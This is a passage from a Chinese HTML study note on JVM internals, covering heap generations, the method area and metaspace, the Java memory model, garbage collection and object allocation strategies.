break-all;">setPrioruty()</p>，该方法是C实现的，并被植入 JVM 内部。</div><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">本地方法栈也是线程私有的</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">本地方法可以通过本地方法接口来访问虚拟机内部的运行时数据区，它甚至可以直接使用本地处理器中的寄存器，直接从本地内存的堆中分配任意数量的内存</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">在 Hotspot JVM 中，直接将本地方法栈和虚拟机栈合二为一</p></li></ul><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">堆内存</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">虚拟机把堆内存<strong>逻辑上</strong>划分成三块区域（分代的唯一理由就是优化 GC 性能）</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">新生带（年轻代）：新对象和没达到一定年龄的对象都在新生代</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">老年代（养老区）：被长时间使用的对象，老年代的内存空间应该要比年轻代更大</p></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">元空间（JDK1.8 之前叫永久代）：像一些方法中的操作临时对象等，JDK1.8 之前是占用 JVM 内存，JDK1.8 之后直接使用物理内存</p></div></li></ul><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">JDK7</figcaption></figure><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><div style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;"><p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">-Xms</p> 用来表示堆的起始内存，等价于 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">-XX:InitialHeapSize</p>默认情况下，初始堆内存大小为：电脑内存大小/64</div></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><div style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;"><p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">-Xmx</p> 用来表示堆的最大内存，等价于 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">-XX:MaxHeapSize</p>默认情况下，最大堆内存大小为：电脑内存大小/4</div></div></li><li><div style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);"><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">new 的对象先放在伊甸园区，此区有大小限制</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">当伊甸园的空间填满时，程序又需要创建对象，JVM 的垃圾回收器将对伊甸园区进行垃圾回收（Minor GC），将伊甸园区中的不再被其他对象所引用的对象进行销毁。再加载新的对象放到伊甸园区</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">然后将伊甸园中的剩余对象移动到幸存者 0 区</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果再次触发垃圾回收，此时上次幸存下来的放到幸存者 0 区，如果没有回收，就会放到幸存者 1 区</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">如果再次经历垃圾回收，此时会重新放回幸存者 0 区，接着再去幸存者 1 区</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">什么时候才会去养老区呢？ 默认是 15 次回收标记</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">在养老区，相对悠闲。当养老区内存不足时，再次触发 Major GC，进行养老区的内存清理</p><p style="padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: black;">若养老区执行了 Major GC 之后发现依然无法进行对象的保存，就会产生 OOM 异常</p></div></li></ul><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">方法区</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">方法区（Method Area）与 Java 堆一样，是所有线程共享的内存区域。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong><span style="text-decoration:underline;">方法区用于存储已被虚拟机加载的类型信息、常量、静态变量、即时编译器编译后的代码缓存等。</span></strong></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">虽然 Java 虚拟机规范把方法区描述为堆的一个逻辑部分，但是它却有一个别名叫 Non-Heap（非堆），目的应该是与 Java 堆区分</p><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">运行时常量池（Runtime Constant Pool）是方法区的一部分。Class 文件中除了有类的版本/字段/方法/接口等描述信息外，还有一项信息是常量池（Constant Pool Table），用于存放编译期生成的各种字面量和符号引用，这部分内容将类在加载后进入方法区的运行时常量池中存放。运行期间也可能将新的常量放入池中，这种特性被开发人员利用得比较多的是 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">String.intern()</p>方法。受方法区内存的限制，当常量池无法再申请到内存时会抛出 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">OutOfMemoryErro</p>r 异常</div><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">**方法区（method area）*<em>只是 **JVM 规范**中定义的一个*<em>概念</em></em>，用于存储类信息、常量池、静态变量、JIT编译后的代码等数据，并没有规定如何去实现它，不同的厂商有不同的实现</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>永久代（PermGen）**是 **Hotspot** 虚拟机特有的概念， Java8 的时候又被**元空间</strong>取代了</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">永久代物理是堆的一部分，和新生代，老年代地址是连续的（受垃圾回收器管理），而元空间存在于本地内存（我们常说的堆外内存，不受垃圾回收器管理），这样就不受 JVM 限制了，也比较难发生OOM（都会有溢出异常）</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">存储内容不同，元空间存储类的元信息，静态变量和常量池等并入堆中。相当于永久代的数据被分到了堆和元空间中</p></li></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">内存模型</h3><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">java-memory-model-3 <em style="color: black;">1</em>.png</figcaption></figure><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">img</figcaption></figure><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JMM编译器及处理器重排序、顺序一致性、happen-before（略）</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Java 程序的内存可见性保证按程序类型可以分为下列三类：</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">单线程程序。单线程程序不会出现内存可见性问题。编译器，runtime 和处理器会共同确保单线程程序的执行结果与该程序在顺序一致性模型中的执行结果相同。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">正确同步的多线程程序。正确同步的多线程程序的执行将具有顺序一致性（程序的执行结果与该程序在顺序一致性内存模型中的执行结果相同）。这是 JMM 关注的重点，JMM 通过限制编译器和处理器的重排序来为程序员提供内存可见性保证。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">未同步 / 未正确同步的多线程程序。JMM 为它们提供了最小安全性保障：线程执行时读取到的值，要么是之前某个线程写入的值，要么是默认值（0，null，false）。</p></li></ul><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><a href="https://pdai.tech/md/java/jvm/java-jvm-jmm.html" target="_blank">https://pdai.tech/md/java/jvm/java-jvm-jmm.html</a></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">详细内容在这里，建议用到条件竞争等涉及多线程内存读写相关的漏洞或者JVM性能优化相关的内容再看，不然看过也会忘。</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">GC垃圾回收</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">使用可达性分析算法，通过 GC Roots 作为起始点进行搜索，能够到达到的对象都是存活的，不可达的对象可被回收</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">虚拟机栈中引用的对象</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">本地方法栈中引用的对象</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">方法区中类静态属性引用的对象</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">方法区中的常量引用的对象</p></li></ul><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">方法区的回收主要是对常量池的回收和对类的卸载</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">类的卸载条件很多，需要满足以下三个条件，并且满足了也不一定会被卸载:</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">该类所有的实例都已经被回收，也就是堆中不存在该类的任何实例。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">加载该类的 ClassLoader 已经被回收。</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">该类对应的 Class 对象没有在任何地方被引用，也就无法在任何地方通过反射访问该类方法</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">当一个对象可被回收时，如果需要执行该对象的 finalize() 方法，那么就有可能通过在该方法中让对象重新被引用，从而实现自救。自救只能进行一次，如果回收的对象之前调用了 finalize() 方法自救，后面回收时不会调用 finalize() 方法</p></li></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Minor GC、Major GC、Full GC</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JVM 在进行 GC 时，并非每次都对堆内存（新生代、老年代；方法区）区域一起回收的，大部分时候回收的都是指新生代。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">针对 HotSpot VM 的实现，它里面的 GC 按照回收区域又分为两大类：部分收集（Partial GC），整堆收集（Full GC）</p><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">部分收集：不是完整收集整个 Java 堆的垃圾收集。其中又分为：</p></li><ul style="margin-top: 8px;margin-bottom: 8px;padding-left: 25px;color: black;list-style-type: square;" class="list-paddingleft-1"><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">目前只有 G1 GC 会有这种行为</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">目前，只有 CMS GC 会有单独收集老年代的行为</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">很多时候 Major GC 会和 Full GC 混合使用，需要具体分辨是老年代回收还是整堆回收</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">新生代收集（Minor GC/Young GC）：只是新生代的垃圾收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">老年代收集（Major GC/Old GC）：只是老年代的垃圾收集</p></li><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">混合收集（Mixed GC）：收集整个新生代以及部分老年代的垃圾收集</p></li></ul><li><p style="margin-top: 5px;margin-bottom: 5px;line-height: 26px;color: rgb(1, 1, 1);">整堆收集（Full GC）：收集整个 Java 堆和方法区的垃圾</p></li></ul><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">内存分配策略</h3><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"># 1. 对象优先在 Eden 分配</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">大多数情况下，对象在新生代 Eden 区分配，当 Eden 区空间不够时，发起 Minor GC。</p><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"># 2. 大对象直接进入老年代</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">大对象是指需要连续内存空间的对象，最典型的大对象是那种很长的字符串以及数组。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">经常出现大对象会提前触发垃圾收集以获取足够的连续空间分配给大对象。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">-XX:PretenureSizeThreshold，大于此值的对象直接在老年代分配，避免在 Eden 区和 Survivor 区之间的大量内存复制。</p><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"># 3. 长期存活的对象进入老年代</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">为对象定义年龄计数器，对象在 Eden 出生并经过 Minor GC 依然存活，将移动到 Survivor 中，年龄就增加 1 岁，增加到一定年龄则移动到老年代中。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">-XX:MaxTenuringThreshold 用来定义年龄的阈值。</p><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"># 4. 动态对象年龄判定</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">虚拟机并不是永远地要求对象的年龄必须达到 MaxTenuringThreshold 才能晋升老年代，如果在 Survivor 中相同年龄所有对象大小的总和大于 Survivor 空间的一半，则年龄大于或等于该年龄的对象可以直接进入老年代，无需等到 MaxTenuringThreshold 中要求的年龄。</p><h4 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 18px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"># 5. 空间分配担保</h4><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">在发生 Minor GC 之前，虚拟机先检查老年代最大可用的连续空间是否大于新生代所有对象总空间，如果条件成立的话，那么 Minor GC 可以确认是安全的。</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">如果不成立的话虚拟机会查看 HandlePromotionFailure 设置值是否允许担保失败，如果允许那么就会继续检查老年代最大可用的连续空间是否大于历次晋升到老年代对象的平均大小，如果大于，将尝试着进行一次 Minor 